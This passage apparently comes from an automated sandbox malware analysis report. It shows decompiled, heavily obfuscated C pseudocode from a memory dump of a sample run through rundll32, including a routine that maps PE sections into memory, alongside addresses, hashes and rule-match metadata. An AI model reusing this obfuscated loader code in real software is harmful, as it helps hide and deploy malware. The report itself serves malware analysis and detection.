				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E002D0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E002E0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E002C7FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E002C3DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E002DAC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                                    0x002ddee3
                                                                                                                                    0x002ddeea
                                                                                                                                    0x002ddef1
                                                                                                                                    0x002ddef3
                                                                                                                                    0x002ddef4
                                                                                                                                    0x002ddefb
                                                                                                                                    0x002ddf02
                                                                                                                                    0x002ddf03
                                                                                                                                    0x002ddf04
                                                                                                                                    0x002ddf09
                                                                                                                                    0x002ddf11
                                                                                                                                    0x002ddf14
                                                                                                                                    0x002ddf1b
                                                                                                                                    0x002ddf23
                                                                                                                                    0x002ddf28
                                                                                                                                    0x002ddf30
                                                                                                                                    0x002ddf38
                                                                                                                                    0x002ddf40
                                                                                                                                    0x002ddf48
                                                                                                                                    0x002ddf50
                                                                                                                                    0x002ddf58
                                                                                                                                    0x002ddf60
                                                                                                                                    0x002ddf68
                                                                                                                                    0x002ddf70
                                                                                                                                    0x002ddf78
                                                                                                                                    0x002ddf80
                                                                                                                                    0x002ddf85
                                                                                                                                    0x002ddf8a
                                                                                                                                    0x002ddf92
                                                                                                                                    0x002ddf9a
                                                                                                                                    0x002ddfa6
                                                                                                                                    0x002ddfa9
                                                                                                                                    0x002ddfad
                                                                                                                                    0x002ddfb5
                                                                                                                                    0x002ddfbd
                                                                                                                                    0x002ddfc5
                                                                                                                                    0x002ddfcd
                                                                                                                                    0x002ddfd5
                                                                                                                                    0x002ddfdd
                                                                                                                                    0x002ddfe5
                                                                                                                                    0x002ddfed
                                                                                                                                    0x002ddffa
                                                                                                                                    0x002ddffe
                                                                                                                                    0x002de006
                                                                                                                                    0x002de00e
                                                                                                                                    0x002de016
                                                                                                                                    0x002de01e
                                                                                                                                    0x002de026
                                                                                                                                    0x002de02e
                                                                                                                                    0x002de036
                                                                                                                                    0x002de044
                                                                                                                                    0x002de045
                                                                                                                                    0x002de049
                                                                                                                                    0x002de051
                                                                                                                                    0x002de059
                                                                                                                                    0x002de061
                                                                                                                                    0x002de069
                                                                                                                                    0x002de071
                                                                                                                                    0x002de079
                                                                                                                                    0x002de081
                                                                                                                                    0x002de089
                                                                                                                                    0x002de099
                                                                                                                                    0x002de0a1
                                                                                                                                    0x002de0ae
                                                                                                                                    0x002de0b2
                                                                                                                                    0x002de0cc
                                                                                                                                    0x002de0d0
                                                                                                                                    0x002de0d8
                                                                                                                                    0x002de0d8
                                                                                                                                    0x002de0e6
                                                                                                                                    0x002de176
                                                                                                                                    0x002de17b
                                                                                                                                    0x002de17e
                                                                                                                                    0x00000000
                                                                                                                                    0x002de0e8
                                                                                                                                    0x002de0ee
                                                                                                                                    0x002de153
                                                                                                                                    0x002de155
                                                                                                                                    0x002de158
                                                                                                                                    0x00000000
                                                                                                                                    0x002de0f0
                                                                                                                                    0x002de0f6
                                                                                                                                    0x002de1bd
                                                                                                                                    0x002de0fc
                                                                                                                                    0x002de102
                                                                                                                                    0x002de13c
                                                                                                                                    0x002de13d
                                                                                                                                    0x002de13e
                                                                                                                                    0x002de143
                                                                                                                                    0x002de147
                                                                                                                                    0x002de149
                                                                                                                                    0x002de14b
                                                                                                                                    0x00000000
                                                                                                                                    0x002de14b
                                                                                                                                    0x002de104
                                                                                                                                    0x002de106
                                                                                                                                    0x00000000
                                                                                                                                    0x002de10c
                                                                                                                                    0x002de11e
                                                                                                                                    0x002de123
                                                                                                                                    0x002de126
                                                                                                                                    0x00000000
                                                                                                                                    0x002de126
                                                                                                                                    0x002de106
                                                                                                                                    0x002de102
                                                                                                                                    0x002de0f6
                                                                                                                                    0x002de0ee
                                                                                                                                    0x002de1c5
                                                                                                                                    0x002de1c7
                                                                                                                                    0x002de1cc
                                                                                                                                    0x002de1cc
                                                                                                                                    0x002de1d3
                                                                                                                                    0x002de1d3
                                                                                                                                    0x002de18f
                                                                                                                                    0x002de192
                                                                                                                                    0x002de197
                                                                                                                                    0x002de197
                                                                                                                                    0x002de197
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d<$g$Wp
                                                                                                                                    • API String ID: 0-355099142
                                                                                                                                    • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                    • Instruction ID: 8bc03cd1631752adf3b8fd55e616d29b4ca4d2259f4c0ecc16590f44ecea306f
                                                                                                                                    • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                    • Instruction Fuzzy Hash: A57133B11193419FC764DF61C48982FBBF1FBC9748F10891EF29A96220D3B68A59CF46
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DC3A0 Relevance: 3.9, Strings: 3, Instructions: 150COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E002C474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E002CA3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E002CED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E002CED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                                    0x002dc3a5
                                                                                                                                    0x002dc3a9
                                                                                                                                    0x002dc3ab
                                                                                                                                    0x002dc3ad
                                                                                                                                    0x002dc3b1
                                                                                                                                    0x002dc3b5
                                                                                                                                    0x002dc3b6
                                                                                                                                    0x002dc3b7
                                                                                                                                    0x002dc3bc
                                                                                                                                    0x002dc3c3
                                                                                                                                    0x002dc3cb
                                                                                                                                    0x002dc3d3
                                                                                                                                    0x002dc3db
                                                                                                                                    0x002dc3e6
                                                                                                                                    0x002dc3eb
                                                                                                                                    0x002dc3f1
                                                                                                                                    0x002dc3f9
                                                                                                                                    0x002dc401
                                                                                                                                    0x002dc409
                                                                                                                                    0x002dc416
                                                                                                                                    0x002dc419
                                                                                                                                    0x002dc41d
                                                                                                                                    0x002dc425
                                                                                                                                    0x002dc42d
                                                                                                                                    0x002dc435
                                                                                                                                    0x002dc43d
                                                                                                                                    0x002dc445
                                                                                                                                    0x002dc44d
                                                                                                                                    0x002dc455
                                                                                                                                    0x002dc45d
                                                                                                                                    0x002dc465
                                                                                                                                    0x002dc46d
                                                                                                                                    0x002dc472
                                                                                                                                    0x002dc47a
                                                                                                                                    0x002dc482
                                                                                                                                    0x002dc48a
                                                                                                                                    0x002dc48f
                                                                                                                                    0x002dc497
                                                                                                                                    0x002dc49f
                                                                                                                                    0x002dc4a7
                                                                                                                                    0x002dc4af
                                                                                                                                    0x002dc4b7
                                                                                                                                    0x002dc4c7
                                                                                                                                    0x002dc4cb
                                                                                                                                    0x002dc4d4
                                                                                                                                    0x002dc4d9
                                                                                                                                    0x002dc4df
                                                                                                                                    0x002dc4e7
                                                                                                                                    0x002dc4ef
                                                                                                                                    0x002dc4f7
                                                                                                                                    0x002dc4ff
                                                                                                                                    0x002dc507
                                                                                                                                    0x002dc50f
                                                                                                                                    0x002dc518
                                                                                                                                    0x002dc51b
                                                                                                                                    0x002dc51f
                                                                                                                                    0x002dc527
                                                                                                                                    0x002dc52f
                                                                                                                                    0x002dc537
                                                                                                                                    0x002dc53f
                                                                                                                                    0x002dc54c
                                                                                                                                    0x002dc550
                                                                                                                                    0x002dc55a
                                                                                                                                    0x002dc562
                                                                                                                                    0x002dc56a
                                                                                                                                    0x002dc572
                                                                                                                                    0x002dc57a
                                                                                                                                    0x002dc58a
                                                                                                                                    0x002dc58e
                                                                                                                                    0x002dc593
                                                                                                                                    0x002dc595
                                                                                                                                    0x002dc59a
                                                                                                                                    0x002dc5a9
                                                                                                                                    0x002dc5c3
                                                                                                                                    0x002dc5c5
                                                                                                                                    0x002dc5ca
                                                                                                                                    0x002dc628
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc62a
                                                                                                                                    0x002dc5dd
                                                                                                                                    0x002dc5e6
                                                                                                                                    0x002dc5f0
                                                                                                                                    0x002dc5f5
                                                                                                                                    0x002dc623
                                                                                                                                    0x002dc60a
                                                                                                                                    0x002dc618
                                                                                                                                    0x002dc61d
                                                                                                                                    0x002dc620
                                                                                                                                    0x002dc620
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc627
                                                                                                                                    0x002dc630

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: P;8$V"$`y
                                                                                                                                    • API String ID: 0-4109183828
                                                                                                                                    • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                    • Instruction ID: fa778ef1d77e87268bf766320fc4f0bf3e1d1a8109cb3831a5b84604b96b9c5c
                                                                                                                                    • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                    • Instruction Fuzzy Hash: 326133B15183409FC354CF66C88991BBBF1FBC9718F108A1DF69A96260D7B2D919CF06
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C1A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C1A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E002DD97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E002C3DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E002C2A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                                    0x002c1a5d
                                                                                                                                    0x002c1a61
                                                                                                                                    0x002c1a63
                                                                                                                                    0x002c1a65
                                                                                                                                    0x002c1a69
                                                                                                                                    0x002c1a6a
                                                                                                                                    0x002c1a6b
                                                                                                                                    0x002c1a70
                                                                                                                                    0x002c1a78
                                                                                                                                    0x002c1a7b
                                                                                                                                    0x002c1a85
                                                                                                                                    0x002c1a8d
                                                                                                                                    0x002c1a8f
                                                                                                                                    0x002c1a97
                                                                                                                                    0x002c1a9c
                                                                                                                                    0x002c1aa4
                                                                                                                                    0x002c1aac
                                                                                                                                    0x002c1ab4
                                                                                                                                    0x002c1abc
                                                                                                                                    0x002c1ac4
                                                                                                                                    0x002c1ad3
                                                                                                                                    0x002c1ad4
                                                                                                                                    0x002c1ad8
                                                                                                                                    0x002c1ae0
                                                                                                                                    0x002c1ae8
                                                                                                                                    0x002c1af5
                                                                                                                                    0x002c1af9
                                                                                                                                    0x002c1b01
                                                                                                                                    0x002c1b06
                                                                                                                                    0x002c1b0e
                                                                                                                                    0x002c1b16
                                                                                                                                    0x002c1b1e
                                                                                                                                    0x002c1b26
                                                                                                                                    0x002c1b2e
                                                                                                                                    0x002c1b38
                                                                                                                                    0x002c1b3c
                                                                                                                                    0x002c1b44
                                                                                                                                    0x002c1b4c
                                                                                                                                    0x002c1b51
                                                                                                                                    0x002c1b59
                                                                                                                                    0x002c1b61
                                                                                                                                    0x002c1b69
                                                                                                                                    0x002c1b6e
                                                                                                                                    0x002c1b72
                                                                                                                                    0x002c1b7d
                                                                                                                                    0x002c1b81
                                                                                                                                    0x002c1b89
                                                                                                                                    0x002c1b91
                                                                                                                                    0x002c1b96
                                                                                                                                    0x002c1b9e
                                                                                                                                    0x002c1ba6
                                                                                                                                    0x002c1bb0
                                                                                                                                    0x002c1c36
                                                                                                                                    0x002c1c38
                                                                                                                                    0x002c1bb2
                                                                                                                                    0x002c1bb8
                                                                                                                                    0x002c1bf9
                                                                                                                                    0x002c1bfe
                                                                                                                                    0x002c1c01
                                                                                                                                    0x00000000
                                                                                                                                    0x002c1bba
                                                                                                                                    0x002c1bc0
                                                                                                                                    0x002c1c0d
                                                                                                                                    0x002c1c0d
                                                                                                                                    0x002c1c13
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c1c15
                                                                                                                                    0x002c1bc2
                                                                                                                                    0x002c1bd7
                                                                                                                                    0x002c1bdc
                                                                                                                                    0x002c1be1
                                                                                                                                    0x002c1be3
                                                                                                                                    0x00000000
                                                                                                                                    0x002c1be3
                                                                                                                                    0x002c1be1
                                                                                                                                    0x002c1bc0
                                                                                                                                    0x002c1bb8
                                                                                                                                    0x002c1c44
                                                                                                                                    0x002c1c44
                                                                                                                                    0x002c1c08
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %#O$DAZ$DAZ
                                                                                                                                    • API String ID: 0-2081751441
                                                                                                                                    • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                    • Instruction ID: ffa7949745c70c09134b709494667eee014e3fe203e6b1de4f4145909f4304d7
                                                                                                                                    • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                    • Instruction Fuzzy Hash: 865166715083029FC758CF25D98691FBBE1FBD8708F500A2EF586A2221D375CA298F87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E0C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E0C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E002DC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E002DC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E002C474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                                    0x002e0c14
                                                                                                                                    0x002e0c1b
                                                                                                                                    0x002e0c1d
                                                                                                                                    0x002e0c27
                                                                                                                                    0x002e0c2f
                                                                                                                                    0x002e0c34
                                                                                                                                    0x002e0c3c
                                                                                                                                    0x002e0c44
                                                                                                                                    0x002e0c49
                                                                                                                                    0x002e0c51
                                                                                                                                    0x002e0c56
                                                                                                                                    0x002e0c5e
                                                                                                                                    0x002e0c66
                                                                                                                                    0x002e0c6e
                                                                                                                                    0x002e0c76
                                                                                                                                    0x002e0c7e
                                                                                                                                    0x002e0c86
                                                                                                                                    0x002e0c8e
                                                                                                                                    0x002e0c96
                                                                                                                                    0x002e0c9e
                                                                                                                                    0x002e0ca6
                                                                                                                                    0x002e0cab
                                                                                                                                    0x002e0cb8
                                                                                                                                    0x002e0cbc
                                                                                                                                    0x002e0cc4
                                                                                                                                    0x002e0cc6
                                                                                                                                    0x002e0cce
                                                                                                                                    0x002e0cd3
                                                                                                                                    0x002e0ce7
                                                                                                                                    0x002e0ce8
                                                                                                                                    0x002e0cec
                                                                                                                                    0x002e0cf4
                                                                                                                                    0x002e0cfc
                                                                                                                                    0x002e0d04
                                                                                                                                    0x002e0d12
                                                                                                                                    0x002e0d16
                                                                                                                                    0x002e0d1e
                                                                                                                                    0x002e0d26
                                                                                                                                    0x002e0d2e
                                                                                                                                    0x002e0d3b
                                                                                                                                    0x002e0d3f
                                                                                                                                    0x002e0d47
                                                                                                                                    0x002e0d4f
                                                                                                                                    0x002e0d57
                                                                                                                                    0x002e0d5f
                                                                                                                                    0x002e0d67
                                                                                                                                    0x002e0d6f
                                                                                                                                    0x002e0d77
                                                                                                                                    0x002e0d7f
                                                                                                                                    0x002e0d87
                                                                                                                                    0x002e0d94
                                                                                                                                    0x002e0d98
                                                                                                                                    0x002e0da0
